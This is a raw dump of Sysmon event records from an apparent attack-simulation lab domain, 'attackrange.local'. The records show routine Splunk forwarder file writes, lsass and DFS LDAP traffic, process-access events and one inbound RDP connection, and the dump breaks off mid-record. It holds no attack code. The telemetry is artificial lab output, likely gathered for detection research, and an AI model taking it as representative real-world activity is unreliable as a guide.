23542300x80000000000000001057116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.017{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=6394156890C043072E2DC165AFA20B51,SHA256=58A14B6FC92DFC4BB8211E91A7DACD0BF3853F555C944AD2A026A7A7A3CB8C04,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001057115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.002{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 354300x80000000000000001057168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.243{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54277-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.243{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54277-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.218{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54276-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.218{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54276-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.065{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54275-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.065{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54275-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 23542300x8000000000000000981659Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:31.419{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=017B125E10E49CEBC7F6C938727C13F0,SHA256=17F714DE53D1B9453250F8B932675E458E88870705AC2590C14AB6072E659187,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001057162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.944{5EBD8912-8CD0-6151-2E00-00000000FD01}2384win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000001057161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.658{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E0B-6151-C300-00000000FD01}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.658{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.658{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.658{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.658{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.658{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8E0B-6151-C300-00000000FD01}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.658{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E0B-6151-C300-00000000FD01}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:31.659{5EBD8912-8E0B-6151-C300-00000000FD01}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001057153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.055{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54274-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:30.055{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54274-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.998{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54272-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.998{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54272-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.962{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54271-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.962{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54271-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.943{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54270-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001057146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.943{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54270-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001057145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.932{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54269-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001057144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.932{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54269-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001057143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.914{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54268-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:29.914{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54268-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 23542300x80000000000000001057171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:32.986{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F9CB60A0AFC8F70F4964DF13F79D79D,SHA256=3C0029243B4D3F308C60D6109DED438861039AD93A5EA942D02A9809F4E00519,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981663Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:29.940{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54491-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981662Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:32.654{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8A9F85E737722D86316306A84CB92B7,SHA256=0753D8B14589702580AE14924416AA7B3B8D74853B2B09A0E88436B46BCA6CE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981661Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:32.654{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=642C8FCBA70237815803F159D04D2D21,SHA256=396D477FCDDF013E92BB9268BB0BF619C725186E1349051D10167BBFE37D8B3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981660Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:32.607{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DEEB433E119D7A1C24C172A11A9C416,SHA256=3EDCA10CD5A48E729DF97A0A04A1DB64D589F1BBB48CC6D104879ACFC11B5479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:32.017{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB649A5C7176A432039AAA483CC4222F,SHA256=0C29C1E2B8CA6B281A16B591912A8B1D540826014F5E248F020C9D4D4D58AE88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:32.017{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3468DF8B325CA544BED5D95145A58601,SHA256=21041705D5AD83910871C9EB100708B5A944AD5A5253DF4ACF5B3F404824BDBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.986{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EA9F97FDE5913CFB6E30DD56E41682E,SHA256=AE57E23E82F3476CEADC2F1656A6DDCB4AC2AD95907205A9DEBB288D1E762F0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981664Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:33.841{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F325BF1A25545CC487139A087072AA6,SHA256=7531578D51FB9E9B1BFB01B53327175D4190E3A97E327B36FD768840D2AA9FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.877{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27F5569C2ECBFD7DD9645F97B32249C4,SHA256=BE52EF92C738F1971450D91C9A0B59AE84095EC58A2B47CC5C5B96E2755726F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.408{5EBD8912-8E0D-6151-C400-00000000FD01}60966092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.158{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E0D-6151-C400-00000000FD01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.158{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.158{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:33.158{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 